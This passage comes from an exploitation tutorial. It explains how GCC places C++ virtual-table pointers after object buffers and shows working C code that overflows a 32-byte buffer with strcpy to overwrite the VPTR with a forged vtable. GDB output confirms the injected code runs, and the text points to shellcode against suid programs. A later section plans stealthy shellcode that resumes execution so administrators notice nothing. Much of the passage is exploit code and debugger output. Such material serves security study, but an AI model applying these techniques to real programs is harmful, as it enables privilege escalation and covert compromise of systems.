+This pointer is called "VPTR" (Virtual Pointer), and points to an entry in an 
+array of function pointers.  Those point themselves to methods (relative to
+the class).  There is one VTABLE for a class, that contains only pointers to
+all class methods.  We now have the following diagram:
+
+Object[0]: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBVVVV
+                                           =+==
+					    |
+	     +------------------------------+
+	     |
+	     +--> VTABLE_MyClass1: IIIIIIIIIIIIPPPP
+
+Object[1]: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBWWWW
+                                           =+==
+					    |
+	     +------------------------------+
+	     |
+	     +--> VTABLE_MyClass2: IIIIIIIIIIIIQQQQ
+
+Where: B represents a byte of Buffer.
+       V represents a byte of the VPTR to VTABLE_MyClass1.
+       W represents a byte of the VPTR to VTABLE_MyClass2.
+       I represents various information bytes.
+       P represents a byte of the pointer to the PrintBuffer() method of
+        MyClass1.
+       Q represents a byte of the pointer to the PrintBuffer() method of
+        MyClass2.
+
+If we had a third object of MyClass1 class, for example, we would have:
+
+Object[2]: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBVVVV
+
+with VVVV that would point to VTABLE_MyClass1.
+
+We notice that the VPTR is located after our Buffer in the process's memory.
+As we fill this buffer via the strcpy() function, we easily deduct that we can 
+reach the VPTR by filling the buffer!
+
+NOTE: After some tests under Windows, it appears that Visual C++ 6.0 
+places the VPTR right at the beginning of the object, which prevents us from
+using this technique.  On the other hand, C++ GNU places the VPTR at the end
+of the object (which is what we want).
+
+
+----|  VPTR analysis using GDB
+
+Now we will observe the mechanism more precisely, using a debugger.  For this,
+we compile our program and run GDB:
+
+rix@pentium:~/BO > gcc -o bo2 bo2.cpp
+rix@pentium:~/BO > gdb bo2
+GNU gdb 4.17.0.11 with Linux support
+Copyright 1998 Free Software Foundation, Inc.
+GDB is free software, covered by the GNU General Public License, and you are
+welcome to change it and/or distribute copies of it under certain conditions.
+Type "show copying" to see the conditions.
+There is absolutely no warranty for GDB.  Type "show warranty" for details.
+This GDB was configured as "i686-pc-linux-gnu"...
+(gdb) disassemble main
+Dump of assembler code for function main:
+0x80485b0 <main>:       pushl  %ebp
+0x80485b1 <main+1>:     movl   %esp,%ebp
+0x80485b3 <main+3>:     subl   $0x8,%esp
+0x80485b6 <main+6>:     pushl  %edi
+0x80485b7 <main+7>:     pushl  %esi
+0x80485b8 <main+8>:     pushl  %ebx
+0x80485b9 <main+9>:     pushl  $0x24
+0x80485bb <main+11>:    call   0x80487f0 <___builtin_new>
+0x80485c0 <main+16>:    addl   $0x4,%esp
+0x80485c3 <main+19>:    movl   %eax,%eax
+0x80485c5 <main+21>:    pushl  %eax
+0x80485c6 <main+22>:    call   0x8048690 <__8MyClass1>
+0x80485cb <main+27>:    addl   $0x4,%esp
+0x80485ce <main+30>:    movl   %eax,%eax
+0x80485d0 <main+32>:    movl   %eax,0xfffffff8(%ebp)
+0x80485d3 <main+35>:    pushl  $0x24
+0x80485d5 <main+37>:    call   0x80487f0 <___builtin_new>
+0x80485da <main+42>:    addl   $0x4,%esp
+0x80485dd <main+45>:    movl   %eax,%eax
+0x80485df <main+47>:    pushl  %eax
+0x80485e0 <main+48>:    call   0x8048660 <__8MyClass2>
+0x80485e5 <main+53>:    addl   $0x4,%esp
+0x80485e8 <main+56>:    movl   %eax,%eax
+---Type <return> to continue, or q <return> to quit---
+0x80485ea <main+58>:    movl   %eax,0xfffffffc(%ebp)
+0x80485ed <main+61>:    pushl  $0x8048926
+0x80485f2 <main+66>:    movl   0xfffffff8(%ebp),%eax
+0x80485f5 <main+69>:    pushl  %eax
+0x80485f6 <main+70>:    call   0x80486c0 <SetBuffer__9BaseClassPc>
+0x80485fb <main+75>:    addl   $0x8,%esp
+0x80485fe <main+78>:    pushl  $0x804892e
+0x8048603 <main+83>:    movl   0xfffffffc(%ebp),%eax
+0x8048606 <main+86>:    pushl  %eax
+0x8048607 <main+87>:    call   0x80486c0 <SetBuffer__9BaseClassPc>
+0x804860c <main+92>:    addl   $0x8,%esp
+0x804860f <main+95>:    movl   0xfffffff8(%ebp),%eax
+0x8048612 <main+98>:    movl   0x20(%eax),%ebx
+0x8048615 <main+101>:   addl   $0x8,%ebx
+0x8048618 <main+104>:   movswl (%ebx),%eax
+0x804861b <main+107>:   movl   %eax,%edx
+0x804861d <main+109>:   addl   0xfffffff8(%ebp),%edx
+0x8048620 <main+112>:   pushl  %edx
+0x8048621 <main+113>:   movl   0x4(%ebx),%edi
+0x8048624 <main+116>:   call   *%edi
+0x8048626 <main+118>:   addl   $0x4,%esp
+0x8048629 <main+121>:   movl   0xfffffffc(%ebp),%eax
+0x804862c <main+124>:   movl   0x20(%eax),%esi
+0x804862f <main+127>:   addl   $0x8,%esi
+---Type <return> to continue, or q <return> to quit---
+0x8048632 <main+130>:   movswl (%esi),%eax
+0x8048635 <main+133>:   movl   %eax,%edx
+0x8048637 <main+135>:   addl   0xfffffffc(%ebp),%edx
+0x804863a <main+138>:   pushl  %edx
+0x804863b <main+139>:   movl   0x4(%esi),%edi
+0x804863e <main+142>:   call   *%edi
+0x8048640 <main+144>:   addl   $0x4,%esp
+0x8048643 <main+147>:   xorl   %eax,%eax
+0x8048645 <main+149>:   jmp    0x8048650 <main+160>
+0x8048647 <main+151>:   movl   %esi,%esi
+0x8048649 <main+153>:   leal   0x0(%edi,1),%edi
+0x8048650 <main+160>:   leal   0xffffffec(%ebp),%esp
+0x8048653 <main+163>:   popl   %ebx
+0x8048654 <main+164>:   popl   %esi
+0x8048655 <main+165>:   popl   %edi
+0x8048656 <main+166>:   movl   %ebp,%esp
+0x8048658 <main+168>:   popl   %ebp
+0x8048659 <main+169>:   ret
+0x804865a <main+170>:   leal   0x0(%esi),%esi
+End of assembler dump.
+
+Let's analyze, in a detailed manner, what our main() function does:
+
+0x80485b0 <main>:       pushl  %ebp
+0x80485b1 <main+1>:     movl   %esp,%ebp
+0x80485b3 <main+3>:     subl   $0x8,%esp
+0x80485b6 <main+6>:     pushl  %edi
+0x80485b7 <main+7>:     pushl  %esi
+0x80485b8 <main+8>:     pushl  %ebx
+
+The program creates a stack frame, then it reserves 8 bytes on the stack (this 
+is our local Object[] array), that will contain 2 pointers of 4 bytes each,
+respectively in 0xfffffff8 (%ebp) for Object[0] and in 0xfffffffc (%ebp) for
+Object[1].  Next, it saves various registers.
+
+0x80485b9 <main+9>:     pushl  $0x24
+0x80485bb <main+11>:    call   0x80487f0 <___builtin_new>
+0x80485c0 <main+16>:    addl   $0x4,%esp
+
+The program now calls ___builtin_new, that reserves 0x24 (36 bytes) on the
+heap for our Object[0] and sends us back the address of these bytes reserved
+in EAX.  Those 36 bytes represent 32 bytes for our buffer followed by 4 bytes
+for our VPTR.
+
+0x80485c3 <main+19>:    movl   %eax,%eax
+0x80485c5 <main+21>:    pushl  %eax
+0x80485c6 <main+22>:    call   0x8048690 <__8MyClass1>
+0x80485cb <main+27>:    addl   $0x4,%esp
+
+Here, we place the address of the object (contained in EAX) on the stack, then 
+we call the __8MyClass1 function.  This function is in fact the constructor of
+the MyClass1 class.  It is necessary to also notice that in C++, all methods
+include an additional "secret" parameter.  That is the address of the object
+that actually executes the method (the "This" pointer).  Let's analyze
+instructions from this constructor:
+
+(gdb) disassemble __8MyClass1
+Dump of assembler code for function __8MyClass1:
+0x8048690 <__8MyClass1>:        pushl  %ebp
+0x8048691 <__8MyClass1+1>:      movl   %esp,%ebp
+0x8048693 <__8MyClass1+3>:      pushl  %ebx
+0x8048694 <__8MyClass1+4>:      movl   0x8(%ebp),%ebx
+
+EBX now contains the pointer to the 36 reserved bytes ("This" pointer).
+
+0x8048697 <__8MyClass1+7>:      pushl  %ebx
+0x8048698 <__8MyClass1+8>:      call   0x8048700 <__9BaseClass>
+0x804869d <__8MyClass1+13>:     addl   $0x4,%esp
+
+Here, we call the constructor of the BaseClass class.
+
+(gdb) disass __9BaseClass
+Dump of assembler code for function __9BaseClass:
+0x8048700 <__9BaseClass>:       pushl  %ebp
+0x8048701 <__9BaseClass+1>:     movl   %esp,%ebp
+0x8048703 <__9BaseClass+3>:     movl   0x8(%ebp),%edx
+
+EDX receives the pointer to the 36 reserved bytes ("This" pointer).
+
+0x8048706 <__9BaseClass+6>:     movl   $0x8048958,0x20(%edx)
+
+The 4 bytes situated at EDX+0x20 (=EDX+32) receive the $0x8048958 value.
+Then, the __9BaseClass function extends a little farther.  If we launch:
+
+(gdb) x/aw 0x08048958
+0x8048958 <_vt.9BaseClass>:     0x0
+
+We observe that the value that is written in EDX+0x20 (the VPTR of the
+reserved object) receives the address of the VTABLE of the BaseClass class.
+Returning to the code of the MyClass1 constructor:
+
+0x80486a0 <__8MyClass1+16>:     movl   $0x8048948,0x20(%ebx)
+
+It writes the 0x8048948 value to EBX+0x20 (VPTR).  Again, the function extends
+a little farther.  Let's launch:
+
+(gdb) x/aw 0x08048948
+0x8048948 <_vt.8MyClass1>:      0x0
+
+We observe that the VPTR is overwritten, and that it now receives the address
+of the VTABLE of the MyClass1 class.  Our main() function get back (in EAX) a
+pointer to the object allocated in memory.
+
+0x80485ce <main+30>:    movl   %eax,%eax
+0x80485d0 <main+32>:    movl   %eax,0xfffffff8(%ebp)
+
+This pointer is placed in Object[0].  Then, the program uses the same mechanism
+for Object[1], evidently with different addresses.  After all that
+initialization, the following instructions will run: 
+
+0x80485ed <main+61>:    pushl  $0x8048926
+0x80485f2 <main+66>:    movl   0xfffffff8(%ebp),%eax
+0x80485f5 <main+69>:    pushl  %eax
+
+Here, we first place address 0x8048926 as well as the value of Object[0] on
+the stack ("This" pointer).  Observing the 0x8048926 address:
+
+(gdb) x/s 0x08048926
+0x8048926 <_fini+54>:    "string1"
+
+We notice that this address contains "string1" that is going to be copied in
+Buffer via the SetBuffer() function of the BaseClass class.
+
+0x80485f6 <main+70>:    call   0x80486c0 <SetBuffer__9BaseClassPc>
+0x80485fb <main+75>:    addl   $0x8,%esp
+
+We call the SetBuffer() method of the BaseClass class.  It is interesting to
+observe that the call of the SetBuffer method is a static binding (because it
+is not a virtual method).  The same principle is used for the SetBuffer()
+method relative to Object[1]. 
+
+To verify that our 2 objects are correctly initialized at run time, we are 
+going to install the following breakpoints:
+
+0x80485c0: to get the address of the 1st object.
+0x80485da: to get the address of the 2nd object.
+0x804860f: to verify that initializations of objects took place well.
+
+(gdb) break *0x80485c0
+Breakpoint 1 at 0x80485c0
+(gdb) break *0x80485da
+Breakpoint 2 at 0x80485da
+(gdb) break *0x804860f
+Breakpoint 3 at 0x804860f
+
+Finally we run the program:
+
+Starting program: /home/rix/BO/bo2
+Breakpoint 1, 0x80485c0 in main ()
+
+While consulting EAX, we will have the address of our 1st object:
+
+(gdb) info reg eax
+     eax:  0x8049a70   134519408
+
+Then, we continue to the following breakpoint:
+
+(gdb) cont
+Continuing.
+Breakpoint 2, 0x80485da in main ()
+
+We notice our second object address:
+
+(gdb) info reg eax
+     eax:  0x8049a98   134519448
+
+We can now run the constructors and the SetBuffer() methods:
+
+(gdb) cont
+Continuing.
+Breakpoint 3, 0x804860f in main ()
+
+Let's notice that our 2 objects follow themselves in memory (0x8049a70 and 
+0x8049a98).  However, 0x8049a98 - 0x8049a70 = 0x28, which means that there are
+4 bytes that have apparently been inserted between the 1st and the 2nd object.
+If we want to see these bytes:
+
+(gdb) x/aw 0x8049a98-4
+0x8049a94:      0x29
+
+We observe that they contain the value 0x29.  The 2nd object is also followed
+by 4 particular bytes:
+
+(gdb) x/xb 0x8049a98+32+4
+0x8049abc:      0x49
+
+We are now going to display in a more precise manner the internal structure of 
+each of our objects (now initialized):
+
+(gdb) x/s 0x8049a70
+0x8049a70:       "string1"
+(gdb) x/a 0x8049a70+32
+0x8049a90:      0x8048948 <_vt.8MyClass1>
+(gdb) x/s 0x8049a98
+0x8049a98:       "string2"
+(gdb) x/a 0x8049a98+32
+0x8049ab8:      0x8048938 <_vt.8MyClass2>
+
+We can display the content of the VTABLEs of each of our classes:
+
+(gdb) x/a 0x8048948
+0x8048948 <_vt.8MyClass1>:      0x0
+(gdb) x/a 0x8048948+4
+0x804894c <_vt.8MyClass1+4>:    0x0
+(gdb) x/a 0x8048948+8
+0x8048950 <_vt.8MyClass1+8>:    0x0
+(gdb) x/a 0x8048948+12
+0x8048954 <_vt.8MyClass1+12>:   0x8048770 <PrintBuffer__8MyClass1>
+(gdb) x/a 0x8048938
+0x8048938 <_vt.8MyClass2>:      0x0
+(gdb) x/a 0x8048938+4
+0x804893c <_vt.8MyClass2+4>:    0x0
+(gdb) x/a 0x8048938+8
+0x8048940 <_vt.8MyClass2+8>:    0x0
+(gdb) x/a 0x8048938+12
+0x8048944 <_vt.8MyClass2+12>:   0x8048730 <PrintBuffer__8MyClass2>
+
+We see that the PrintBuffer() method is well the 4th method in the VTABLE of 
+our classes.  Next, we are going to analyze the mechanism for dynamic binding.
+It we will continue to run and display registers and memory used.  We will
+execute the code of the function main() step by step, with instructions:
+
+(gdb) ni
+
+Now we are going to run the following instructions:
+
+0x804860f <main+95>:    movl   0xfffffff8(%ebp),%eax
+
+This instruction is going to make EAX point to the 1st object.
+
+0x8048612 <main+98>:    movl   0x20(%eax),%ebx
+0x8048615 <main+101>:   addl   $0x8,%ebx
+
+These instructions are going to make EBX point on the 3rd address from the 
+VTABLE of the MyClass1 class.
+
+0x8048618 <main+104>:   movswl (%ebx),%eax
+0x804861b <main+107>:   movl   %eax,%edx
+
+These instructions are going to load the word at offset +8 in the VTABLE to
+EDX.
+
+0x804861d <main+109>:   addl   0xfffffff8(%ebp),%edx
+0x8048620 <main+112>:   pushl  %edx
+
+These instructions add to EDX the offset of the 1st object, and place the 
+resulting address (This pointer) on the stack.
+
+0x8048621 <main+113>:   movl   0x4(%ebx),%edi        // EDI = *(VPTR+8+4)
+0x8048624 <main+116>:   call   *%edi                 // run the code at EDI
+
+This instructions place in EDI the 4st address (VPTR+8+4) of the VTABLE, that 
+is the address of the PrintBuffer() method of the MyClass1 class. Then, this 
+method is executed.  The same mechanism is used to execute the PrintBuffer()
+method of the MyClass2 class.  Finally, the function main() ends a little
+farther, using a RET.
+
+We have observed a "strange handling", to point to the beginning of the object 
+in memory, since we went to look for an offset word in VPTR+8 to add it to the 
+address of our 1st object.  This manipulation doesn't serve has anything in
+this precise case, because the  value pointed by VPTR+8 was 0:
+
+(gdb) x/a 0x8048948+8
+0x8048950 <_vt.8MyClass1+8>:    0x0
+
+However, this manipulation is necessary in several convenient cases. It is why 
+it is important to notice it. We will come back besides later on this 
+mechanism, because it will provoke some problems later.
+
+
+----|  Exploiting VPTR
+
+We are now going to try to exploit in a simple manner the buffer overflow.
+For it, we must proceed as this:
+- To construct our own VTABLE, whose addresses will point to the code that we 
+want to run (a shellcode for example ;)
+- To overflow the content of the VPTR so that it points to our own VTABLE.
+
+One of the means to achieve it, is to code our VTABLE in the beginning of the 
+buffer that we will overflow. Then, we must set a VPTR value to point back to 
+the beginning of our buffer (our VTABLE). We can either place our shellcode
+directly after our VTABLE in our buffer, either place it after the value of the
+VPTR that we are going to overwrite.
+However, if we place our shellcode after the VPTR, it is necessary to be 
+certain that we have access to this part of the memory, to not provoke 
+segmentation faults.
+This consideration depends largely of the size of the buffer.
+A buffer of large size will be able to contain without problem a VTABLE and a 
+shellcode, and then avoid all risks of segmentation faults.
+Let's remind ourselves that our objects are each time followed by a 4 bytes 
+sequence (0x29, 0x49), and that we can without problems write our 00h (end of 
+string) to the byte behind our VPTR.
+
+To check we are going to place our shellcode rightly before our VPTR.
+We are going to adopt the following structure in our buffer:
+
+ +------(1)---<----------------+
+ |                             |
+ |                           ==+=
+SSSS ..... SSSS ....  B ... CVVVV0
+==+=       =+==             |
+  |         |               |
+  +----(2)--+->-------------+
+
+Where: V represents bytes of the address of the beginning of our buffer.
+       S represents bytes of the address of our shellcode, here the address of
+        C (address S=address V+offset VPTR in the buffer-1 in this case, because
+        we have placed our shellcode rightly before the VPTR).
+       B represents the possible bytes of any value alignment (NOPs:), to
+        align the value of our VPTR on the VPTR of the object.
+       C represents the byte of the shellcode, in this case, a simple CCh byte 
+        (INT 3), that will provoke a SIGTRAP signal.
+       0 represents the 00h byte, that will be at the end of our buffer (for 
+        strcpy() function).
+
+The number of addresses to put in the beginning of our buffer (SSSS) depends
+if we know or not the index in the VTABLE of the 1st method that will be
+called after our overflow:
+Either we knows this index, and then we writes the corresponding pointer.
+Either we doesn't know this index, and we generate a maximum number of
+pointers. Then, we hope the method that will be executed will use one of those
+overwritten pointers. Notice that a class that contains 200 methods isn't very
+usual ;)
+The address to put in VVVV (our VPTR) depends principally of the execution of 
+the program.
+It is necessary to note here that our objects were allocated on the heap, and 
+that it is difficult to know exactly their addresses.
+
+We are going to write a small function that will construct us a buffer.
+This function will receive 3 parameters:
+- BufferAddress: the address of the beginning of the buffer that we will 
+overflow.
+- NAddress: the number of addresses that we want in our VTABLE.
+
+Here is the code of our BufferOverflow() function:
+
+
+char *BufferOverflow(unsigned long BufferAddress,int NAddress,int VPTROffset) {
+ char *Buffer;
+ unsigned long *LongBuffer;
+ unsigned long CCOffset;
+ int i;
+ 
+ Buffer=(char*)malloc(VPTROffset+4);
+  // allocates the buffer.
+
+ CCOffset=(unsigned long)VPTROffset-1;
+  // calculates the offset of the code to execute in the buffer.
+  
+ for (i=0;i<VPTROffset;i++) Buffer[i]='\x90';
+  // fills the buffer with 90h (NOP, old habit:)))
+  
+ LongBuffer=(unsigned long*)Buffer;
+  // constructs a pointer to place addresses in our VTABLE.
+  
+ for (i=0;i<NAddress;i++) LongBuffer[i]=BufferAddress+CCOffset;
+  // fills our VTABLE at the beginning of the buffer with the address of the 
+  // shellcode.
+  
+ LongBuffer=(unsigned long*)&Buffer[VPTROffset];
+  // constructs a pointeur on VPTR.
+  
+ *LongBuffer=BufferAddress;
+  // value that will overwrite VPTR.
+  
+ Buffer[CCOffset]='\xCC';
+  // our executable code.
+
+ Buffer[VPTROffset+4]='\x00';
+  // finishes by a 00h char (end string).
+ 
+ return Buffer; 
+}
+
+
+In our program we can now call our BufferOverflow() function, with as 
+parameters:
+- the address of our buffer, here the address of our object (Object[0]).
+- 4 values in our VTABLE, in this case (since PrintBuffer() is in VTABLE+8+4).
+- 32 as offset for VPTR.
+Here is the resulting code (bo3.cpp):
+
+
+#include <stdio.h>
+#include <string.h>
+#include <malloc.h>
+
+class BaseClass { 
+private:
+ char Buffer[32];
+public:
+ void SetBuffer(char *String) {
+  strcpy(Buffer,String);
+ }
+ virtual void PrintBuffer() {
+  printf("%s\n",Buffer);
+ }
+};
+
+class MyClass1:public BaseClass {
+public:
+ void PrintBuffer() {
+  printf("MyClass1: ");
+  BaseClass::PrintBuffer();
+ }
+};
+
+class MyClass2:public BaseClass {
+public:
+ void PrintBuffer() {
+  printf("MyClass2: ");
+  BaseClass::PrintBuffer();
+ }
+};
+
+char *BufferOverflow(unsigned long BufferAddress,int NAddress,int VPTROffset) {
+ char *Buffer;
+ unsigned long *LongBuffer;
+ unsigned long CCOffset;
+ int i;
+ 
+ Buffer=(char*)malloc(VPTROffset+4+1);
+
+ CCOffset=(unsigned long)VPTROffset-1; 
+ for (i=0;i<VPTROffset;i++) Buffer[i]='\x90';
+ LongBuffer=(unsigned long*)Buffer;
+ for (i=0;i<NAddress;i++) LongBuffer[i]=BufferAddress+CCOffset;
+ LongBuffer=(unsigned long*)&Buffer[VPTROffset];
+ *LongBuffer=BufferAddress;
+ Buffer[CCOffset]='\xCC';
+ Buffer[VPTROffset+4]='\x00';
+ return Buffer; 
+}
+
+void main() {
+ BaseClass *Object[2];
+
+ Object[0]=new MyClass1;
+ Object[1]=new MyClass2; 
+ Object[0]->SetBuffer(BufferOverflow((unsigned long)&(*Object[0]),4,32));  
+ Object[1]->SetBuffer("string2");
+ Object[0]->PrintBuffer();
+ Object[1]->PrintBuffer();
+}
+
+
+We compile, and we launch GDB:
+
+rix@pentium:~/BO > gcc -o bo3 bo3.cpp
+rix@pentium:~/BO > gdb bo3
+...
+(gdb) disass main
+Dump of assembler code for function main:
+0x8048670 <main>:       pushl  %ebp
+0x8048671 <main+1>:     movl   %esp,%ebp
+0x8048673 <main+3>:     subl   $0x8,%esp
+0x8048676 <main+6>:     pushl  %edi
+0x8048677 <main+7>:     pushl  %esi
+0x8048678 <main+8>:     pushl  %ebx
+0x8048679 <main+9>:     pushl  $0x24
+0x804867b <main+11>:    call   0x80488c0 <___builtin_new>
+0x8048680 <main+16>:    addl   $0x4,%esp
+0x8048683 <main+19>:    movl   %eax,%eax
+0x8048685 <main+21>:    pushl  %eax
+0x8048686 <main+22>:    call   0x8048760 <__8MyClass1>
+0x804868b <main+27>:    addl   $0x4,%esp
+0x804868e <main+30>:    movl   %eax,%eax
+0x8048690 <main+32>:    movl   %eax,0xfffffff8(%ebp)
+0x8048693 <main+35>:    pushl  $0x24
+0x8048695 <main+37>:    call   0x80488c0 <___builtin_new>
+0x804869a <main+42>:    addl   $0x4,%esp
+0x804869d <main+45>:    movl   %eax,%eax
+0x804869f <main+47>:    pushl  %eax
+0x80486a0 <main+48>:    call   0x8048730 <__8MyClass2>
+0x80486a5 <main+53>:    addl   $0x4,%esp
+0x80486a8 <main+56>:    movl   %eax,%eax
+---Type <return> to continue, or q <return> to quit---
+0x80486aa <main+58>:    movl   %eax,0xfffffffc(%ebp)
+0x80486ad <main+61>:    pushl  $0x20
+0x80486af <main+63>:    pushl  $0x4
+0x80486b1 <main+65>:    movl   0xfffffff8(%ebp),%eax
+0x80486b4 <main+68>:    pushl  %eax
+0x80486b5 <main+69>:    call   0x80485b0 <BufferOverflow__FUlii>
+0x80486ba <main+74>:    addl   $0xc,%esp
+0x80486bd <main+77>:    movl   %eax,%eax
+0x80486bf <main+79>:    pushl  %eax
+0x80486c0 <main+80>:    movl   0xfffffff8(%ebp),%eax
+0x80486c3 <main+83>:    pushl  %eax
+0x80486c4 <main+84>:    call   0x8048790 <SetBuffer__9BaseClassPc>
+0x80486c9 <main+89>:    addl   $0x8,%esp
+0x80486cc <main+92>:    pushl  $0x80489f6
+0x80486d1 <main+97>:    movl   0xfffffffc(%ebp),%eax
+0x80486d4 <main+100>:   pushl  %eax
+0x80486d5 <main+101>:   call   0x8048790 <SetBuffer__9BaseClassPc>
+0x80486da <main+106>:   addl   $0x8,%esp
+0x80486dd <main+109>:   movl   0xfffffff8(%ebp),%eax
+0x80486e0 <main+112>:   movl   0x20(%eax),%ebx
+0x80486e3 <main+115>:   addl   $0x8,%ebx
+0x80486e6 <main+118>:   movswl (%ebx),%eax
+0x80486e9 <main+121>:   movl   %eax,%edx
+0x80486eb <main+123>:   addl   0xfffffff8(%ebp),%edx
+---Type <return> to continue, or q <return> to quit---
+0x80486ee <main+126>:   pushl  %edx
+0x80486ef <main+127>:   movl   0x4(%ebx),%edi
+0x80486f2 <main+130>:   call   *%edi
+0x80486f4 <main+132>:   addl   $0x4,%esp
+0x80486f7 <main+135>:   movl   0xfffffffc(%ebp),%eax
+0x80486fa <main+138>:   movl   0x20(%eax),%esi
+0x80486fd <main+141>:   addl   $0x8,%esi
+0x8048700 <main+144>:   movswl (%esi),%eax
+0x8048703 <main+147>:   movl   %eax,%edx
+0x8048705 <main+149>:   addl   0xfffffffc(%ebp),%edx
+0x8048708 <main+152>:   pushl  %edx
+0x8048709 <main+153>:   movl   0x4(%esi),%edi
+0x804870c <main+156>:   call   *%edi
+0x804870e <main+158>:   addl   $0x4,%esp
+0x8048711 <main+161>:   xorl   %eax,%eax
+0x8048713 <main+163>:   jmp    0x8048720 <main+176>
+0x8048715 <main+165>:   leal   0x0(%esi,1),%esi
+0x8048719 <main+169>:   leal   0x0(%edi,1),%edi
+0x8048720 <main+176>:   leal   0xffffffec(%ebp),%esp
+0x8048723 <main+179>:   popl   %ebx
+0x8048724 <main+180>:   popl   %esi
+0x8048725 <main+181>:   popl   %edi
+0x8048726 <main+182>:   movl   %ebp,%esp
+0x8048728 <main+184>:   popl   %ebp
+---Type <return> to continue, or q <return> to quit---
+0x8048729 <main+185>:   ret
+0x804872a <main+186>:   leal   0x0(%esi),%esi
+End of assembler dump.
+
+Next, we install a breakpoint in 0x8048690, to get the address of our 1st 
+object.
+
+(gdb) break *0x8048690
+Breakpoint 1 at 0x8048690
+
+And finally, we launch our program:
+
+(gdb) run
+Starting program: /home/rix/BO/bo3
+Breakpoint 1, 0x8048690 in main ()
+
+We read the address of our 1st object:
+
+(gdb) info reg eax
+     eax:  0x8049b38   134519608
+
+Then we pursue, while hoping that all happens as foreseen... :)
+
+Continuing.
+Program received signal SIGTRAP, Trace/breakpoint trap.
+0x8049b58 in ?? ()
+
+We receive a SIGTRAP well, provoked by the instruction preceding the 0x8049b58 
+address. However, the address of our object was 0x8049b38.
+0x8049b58-1-0x8049b38=0x1F (=31), which is exactly the offset of our CCh in our 
+buffer. Therefore, it is well our CCh that has been executed!!!
+You understood it, we can now replace our simple CCh code, by a small
+shellcode, to get some more interesting results, especially if our program
+bo3 is suid... ;)
+
+
+Some variations about the method
+================================
+We have explain here the simplest exploitable mechanism.
+Other more complex cases could possibly appear...
+For example, we could have associations between classes like this:
+
+class MyClass3 { 
+private:
+ char Buffer3[32];
+ MyClass1 *PtrObjectClass;
+public:
+ virtual void Function1() {
+  ...
+  PtrObjectClass1->PrintBuffer();
+  ...
+ }
+};
+
+In this case, we have a relation between 2 classes called "link by reference".
+Our MyClass3 class contains a pointer to another class. If we overflow the 
+buffer in the MyClass3 class, we can overwrite the PtrObjectClass pointer. We
+only need to browse a supplementary pointer ;)
+
+
+ +----------------------------------------------------+
+ |                                                    |
+ +-> VTABLE_MyClass3: IIIIIIIIIIIIRRRR                |
+                                                     =+==
+MyClass3 object: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBPPPPXXXX
+                                                 ==+=
+                                                   |
+ +---------------------<---------------------------+
+ |
+ +--> MyClass1 object: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCYYYY
+                                                       ==+=
+                                                         |
+ +-------------------------------------------------------+
+ |
+ +--> VTABLE_MyClass1: IIIIIIIIIIIIQQQQ
+
+Where: B represents bytes of the Buffer of MyClass4.
+       C represents bytes of the Buffer of MyClass1.
+       P represents bytes of a pointer to a MyClass1 object class.
+       X represents bytes of the possible VPTR of the MyClass4 object class.
+        (it is not necessary to have a VPTR in the class containing the
+        pointer).
+       Y represent bytes of the VPTR of the MyClass1 object class.
+
+This technique doesn't depend here on the structure of the internal class to 
+the compiler (offset of VPTR), but depend of the structure of the class
+defined by the programmer, and dus it can even be exploited in programs coming
+from compilers placing the VPTR at the beginning of the object in memory (for 
+example Visual C++).
+Besides, in this case, the MyClass3 object class possibly have been created
+on the stack (local object), what makes that localization is a lot easier,
+being given that the address of the object will probably be fixed. However, in
+this case, it will be necessary that our stack be executable, and not our heap
+as previously.
+
+We know how to find the values for 2 of the 3 parameters of our
+BufferOverflow() function (number of VTABLE addresses, and offset of the VPTR)
+Indeed these 2 parameters can be easily founded in debugging the code of the 
+program, and besides, their value is fixed from on execution to another.
+On the other hand, the 1st parameter (address of the object in memory), is
+more difficult to establish. In fact, we need this address only because we
+want to place the VTABLE that we created into the buffer.
+
+
+----|  A particular example
+
+Let's suppose that we have a class whose last variable is an exploitable 
+buffer.  This means that if we fill this buffer (for example of size N bytes),
+with N + 4 bytes, we know that we don't have modify anything else in the space
+memory of the process that the content of our buffer, the VPTR, and the
+byte following our VPTR (because character 00h).
+
+Perhaps could we take advantage of this situation.  But how?  We are going to
+use the buffer, to launch a shellcode, and next to follow the execution of the
+program!  The advantage will be enormous, since the program would not be
+finished brutally, and dus will not alert someone eventually controlling or
+logging its execution (administrators...).
+
+Is it possible?
+It would be necessary to first execute our shellcode, to rewrite a chain in
+our buffer, and to restore the stack in the initial state (just before the
+call of our method). Then, it would only remain us to recall the initial
+method, so that the program normally continues.
+
+Here are several remarks and problems that we are going to meet:
+- it is necessary to completely rewrite our buffer (so that the continuation
+ of the execution uses appropriate values), and therefore to overwrite our own
+ shellcode.
+ To avoid it, we are going to copy a part of our shellcode (the smallest part 
+ as possible ) to another place in memory.
+ In this case we are going to copy a part of our shellcode to the stack (we 
+ will call this part of code "stackcode"). It should not pose any particularly 
+ problems if our stack is executable. 
+- We had mentioned before a "strange handling", that consisted to add an
+ offset to the address of our object, and to place this result on the stack,
+ what provided the This pointer to the executed method.
+ The problem is, that here, the offset that is going to be added to the
+ address of our object is going to be took in our VTABLE, and that this offset
+ cannot be 0 (because we cannot have 00h bytes in our buffer).
+ We are going to choose an arbitrary value for this offset, that we will place 
+ in our VTABLE, and correct the This value on the stack later, with a
+ corresponding subtraction.
+- we are going to make a fork () on our process, to launch the execution of
+ the shell (exec ()), and to wait for its termination (wait ()), to continue
+ our execution of the main program.
+- the address where we will continue our execution is constant, because it is
+ the address of the original method (presents in the VTABLE of our object's
+ relative class).
+- we know that we can use our EAX register, because this one would be
+ overwritten in any case by our method's return value.
+- we cannot include any 00h byte in our buffer. We then should regenerate
+ these bytes (necessary for our strings) at run time.
+
+While applying all these important points, we are going to try to construct a 
+buffer according to the following diagram:
+
+ +------------------------------------<-(1)---------------------------------+
+ |   our VTABLE                                                             |
+=+===================                                                     ==+=
+9999TT999999.... MMMM SSSS0000/bin/shAAA.... A BBB... Bnewstring99999.... VVVVL
+                 ==+= ==+=    |      |       | ========
+                   |    |     |      |       |      \
+                   |    +-->--+      |       |        \(a copy on the stack)
+		   |                 |       |      ========
+		   +---(2)-->--------+       |      BBB... B
+                                             |      |      |
+                                             +-(3)->+      +--> old method
+
+Where: 9 represent NOP bytes (90h).
+       T represents bytes forming the word of the offset who will be added to
+        the pointer on the stack (strange handling ;).
+       M represents the address in our buffer of the beginning of our
+        shellcode.
